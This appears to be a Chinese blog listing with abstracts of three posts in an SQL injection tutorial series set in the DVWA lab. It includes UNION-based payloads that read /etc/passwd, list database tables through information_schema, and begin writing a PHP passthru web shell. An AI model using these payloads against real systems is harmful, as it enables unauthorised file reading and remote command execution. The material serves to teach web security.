摘要:
上篇主要概述了查询一些常见表格的方法 这里在增加一些查询的方式 读取文件: 'union select null,load_file('/etc/passwd')-- 写入文件 结合上面,我们可以写入一个文件在目标路径 ' union select null,"<?php passthru($_GE 阅读全文
摘要:
Mysql默认在数据库中存放一个"information_schema"的数据库 查看所有库的所有表 查看所有库的所有表 'union select table_name,table_schema from information_schema.tables--+ 这个过程可以结合hackbar工具 阅读全文
摘要:
SQL注入的原因是因为服务器没有对 客户端数据进行判断,并且前端的数据是攻击者可以控制,攻击者就可以构造不同的语句对数据库进行任意操作 寻找SQL注入点方式: 1.查看是否报错,从而判断是否对输入的SQL语句进行筛查 1.查看是否报错,从而判断是否对输入的SQL语句进行筛查 还是基于DVWA,我们输 阅读全文